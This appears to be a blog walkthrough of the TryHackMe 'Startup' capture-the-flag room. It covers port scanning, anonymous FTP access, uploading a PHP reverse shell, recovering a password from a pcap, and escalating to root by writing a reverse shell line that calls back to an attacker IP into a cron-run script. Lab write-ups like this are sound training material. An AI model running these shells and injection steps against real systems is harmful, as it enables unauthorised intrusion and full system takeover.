Link: https://tryhackme.com/room/startup
Enumeration
#1 “What is the secret spicy soup recipe?“
First, we use:
nmap -sC -sV 10.10.195.79
to find open ports in the machine.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-79.png?w=853)
Port 21 is open so we connect to the server through ftp.
ftp 10.10.195.79
Let’s try anonymous login with:
Name: anonymous
Password: anonymous
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-81.png?w=631)
There is a folder named ftp
and we can upload a php-reverse-shell.php to the server (after changing the IP).
Using dirsearch and we found a folder named files
.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-83.png?w=580)
And we found the location of our shell.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-85.png?w=472)
Stand up a netcat listener on port 1234.
nc -lvnp 1234
Then, we access the link: http://10.10.195.79/files/ftp/shell.php
to trigger a reverse shell.
Then we found a file named “recipe.txt
” and it contains the first flag.
Foothold
#2 “What are the contents of user.txt?“
There is a folder /home/lennie
but we cannot access it.
We found “suspicious.pcapng
” file in /incidents.
We can host a http server with python here.
python3 -m http.server
Then, we access the link: http://10.10.195.79:8000/
and download this file.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-87.png?w=401)
Open it with Wireshark, follow TCP Stream and we found a password.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-88.png?w=636)
Use:
python3 -c 'import pty; pty.spawn("/bin/sh")'
to spawning a TTY Shell.
Then use:
su lennie
with the password and we changed to lennie.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-89.png?w=427)
We can found the second flag.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-90.png?w=296)
Privilege Escalation
#3 “What are the contents of root.txt?“
There is a folder named scripts
.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-91.png?w=461)
Read file “planner.sh
“, we can see that lennie will execute file /etc/print.sh
.
Go to /etc
and check for the files permission of print.sh
, lennie is the owner.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-92.png?w=505)
Then, we will inject a code to this file.
/bin/sh/
sh -i >& /dev/udp/10.6.63.158/4242 0>&1
Stand up a netcat listener on port 4242.
nc -lvup 4242
Then run file print.sh
.
./print.sh
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-94.png?w=439)
And we found root flag.